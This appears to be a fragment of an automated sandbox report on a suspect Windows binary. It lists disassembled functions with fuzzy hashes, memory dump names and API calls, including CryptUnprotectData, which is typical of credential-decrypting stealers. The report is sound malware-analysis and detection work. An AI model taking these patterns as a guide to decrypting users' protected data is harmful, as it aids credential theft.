                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: 566fd017a0c2c94af7c98a821eccbb9a8d3ca16f021fddbf39801b64641229fe
                        • Instruction ID: 282e68a9c07a375504dc4117806458c500a688b8d79beff7ffb077fa4a9d5a8b
                        • Opcode Fuzzy Hash: 566fd017a0c2c94af7c98a821eccbb9a8d3ca16f021fddbf39801b64641229fe
                        • Instruction Fuzzy Hash: CCF01D70350312ABF7301F64AC49F577BE9EF04B50F200155FA49EA2D0E7B49C80CAA4
                        Function 007FFC67 Relevance: 5.3, Strings: 3, Instructions: 1587COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: *0X}$5}jq$f@{]
                        • API String ID: 0-3207220155
                        • Opcode ID: 986e44a1e4d4aa802429304084b8a95bae886c418d79180e1a43479f05e43578
                        • Instruction ID: 028fd4bfb50657edc804c9b8991d221f3f16e1c4757014588f407bb9a1fcf94d
                        • Opcode Fuzzy Hash: 986e44a1e4d4aa802429304084b8a95bae886c418d79180e1a43479f05e43578
                        • Instruction Fuzzy Hash: 68B2C6F360C6009FE704AE2DDC8566AF7E9EF98720F1A892DE6C4C3344E63598458797
                        Function 0045CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(0046B110,00000000,00000001,0046B100,?), ref: 0045CB06
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0045CB46
                        • lstrcpyn.KERNEL32(?,?,00000104), ref: 0045CBC9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                        • String ID:
                        • API String ID: 1940255200-0
                        • Opcode ID: 094b5d2886eac8adab66d69fd793091fed02e0d60aae09db2a1de0823ab13254
                        • Instruction ID: 371d0b72c50a967dcfb9ee8beca44a3392a4b30b335733912665d0457b950156
                        • Opcode Fuzzy Hash: 094b5d2886eac8adab66d69fd793091fed02e0d60aae09db2a1de0823ab13254
                        • Instruction Fuzzy Hash: 09317571A40715BFD710DB94CC96FAAB7B9DB88B11F104185FA14EB2D0D7B4AE44CBA0
                        Function 00449B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00449B9F
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00449BB3
                        • LocalFree.KERNEL32(?), ref: 00449BD7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 0238d53d524565ead65740e23dbf5c3bacb93316dc4ff2ff770d008dd82fc06a
                        • Instruction ID: 1d7ffc46a0c90779d469465d4cbd16d148335c45a430bd322f74e219f4fa0b41
                        • Opcode Fuzzy Hash: 0238d53d524565ead65740e23dbf5c3bacb93316dc4ff2ff770d008dd82fc06a
                        • Instruction Fuzzy Hash: A1011DB5A41309ABE710DBA4DC45FABB779EB44B00F104559EA04AB380E7B4AE008BE5
                        Function 007FF30F Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Ay_${S:f
                        • API String ID: 0-1204020038
                        • Opcode ID: eca41531115f3b012fb5e9662755babcbae8c797a90e57ed6e4014998c46532b
                        • Instruction ID: 38b577bfb749a9fcbdfc6b69144a8ac7d0c8923643a5b095b2fa30e42d95fe76
                        • Opcode Fuzzy Hash: eca41531115f3b012fb5e9662755babcbae8c797a90e57ed6e4014998c46532b
                        • Instruction Fuzzy Hash: 4E518CF3A0C1009FE308AE3DDD8627AFBE5EF94220F1A463DEAC5C3744E53599158682
                        Function 007FF076 Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2z_$ge{}
                        • API String ID: 0-2354384569
                        • Opcode ID: a2c8264cccf9df2d2b67dfb0f0e035d16e04c138d6021731a7fd84f8dd692e3b
                        • Instruction ID: 22eb34e5761c2346ed3f0a467f003b6d78c175baf750512ec1535ec216f01dab
                        • Opcode Fuzzy Hash: a2c8264cccf9df2d2b67dfb0f0e035d16e04c138d6021731a7fd84f8dd692e3b
                        • Instruction Fuzzy Hash: C03179F361D2085FE3186E299C86276B7CAEBD4330F2A873DE694837C4FD3959054286
                        Function 00779A31 Relevance: 1.5, Strings: 1, Instructions: 249COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Ywy
                        • API String ID: 0-26555104
                        • Opcode ID: 8ccb19cd75b9bcb7db5a632d47a39cb820d1c54365cc1a09a4cab700933c35db
                        • Instruction ID: 9d43009b987238fd48e46c2dcda21836b4ea5ddd72b52d3887ab6b544474fa88
                        • Opcode Fuzzy Hash: 8ccb19cd75b9bcb7db5a632d47a39cb820d1c54365cc1a09a4cab700933c35db
                        • Instruction Fuzzy Hash: 0D715BF3A082049FE314AE2AEC447BBBBD5DFD4720F1A893DE78487784E53558418292
                        Function 0074BF84 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Mw+
                        • API String ID: 0-3973434849
                        • Opcode ID: daa4e0b46ea4b68ba951fc1aeb229fc92422008409d6c9357b123d4b42f5d747
                        • Instruction ID: 6d506fac1f8b5fb05d1019059f05cb09ff0a81e45853bd7af39c7f4c9e1da061
                        • Opcode Fuzzy Hash: daa4e0b46ea4b68ba951fc1aeb229fc92422008409d6c9357b123d4b42f5d747
                        • Instruction Fuzzy Hash: 0B5106F3A085149FF700EA2DDC5577ABBD6EB84310F1A853DEAC9C7784E93898158386
                        Function 0080D295 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Ck=o
                        • API String ID: 0-1535260793
                        • Opcode ID: 45db9e2c719a9dbf4f08030b34739f1b127af4d448f752dee248f6a9ac14eb02
                        • Instruction ID: 40f8387351bbabc789644286de7bcb8101a5d1d6b287c26dde3513d2ea7ee877
                        • Opcode Fuzzy Hash: 45db9e2c719a9dbf4f08030b34739f1b127af4d448f752dee248f6a9ac14eb02
                        • Instruction Fuzzy Hash: 03217DB361C31DDBC28059B8AC809767BD9F7643BCF260629F9A6D73C0F521AC019693
                        Function 0091F6FF Relevance: .4, Instructions: 367COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0717bd8b421789f6c92c642957d3ef3fe26d6c5df6f777476ffaebac4cb997cb
                        • Instruction ID: b5042747e244a052638f0f34af5346ade12060c076cf0447208ec1e21d62ec3d
                        • Opcode Fuzzy Hash: 0717bd8b421789f6c92c642957d3ef3fe26d6c5df6f777476ffaebac4cb997cb
                        • Instruction Fuzzy Hash: 41C16AB3B082049FE7109E1CDC817AAB3D9EF84720F19853DEAC8C7744EA399C458796
                        Function 007754CB Relevance: .2, Instructions: 181COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 36e7cd6238b26b8d544a0b60080a4e01037fc6d6caddc4e10e594bf6e18b3b46
                        • Instruction ID: e119b4a0b02417a47108a64e0fb85ebda1e18e071ba100cdefd1082a574d9fac
                        • Opcode Fuzzy Hash: 36e7cd6238b26b8d544a0b60080a4e01037fc6d6caddc4e10e594bf6e18b3b46
                        • Instruction Fuzzy Hash: AC513BF3B592005FF300997EEC8577BB6DBDBD4620F2A853AE594C7748E97888024152
                        Function 0069C5BF Relevance: .2, Instructions: 175COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
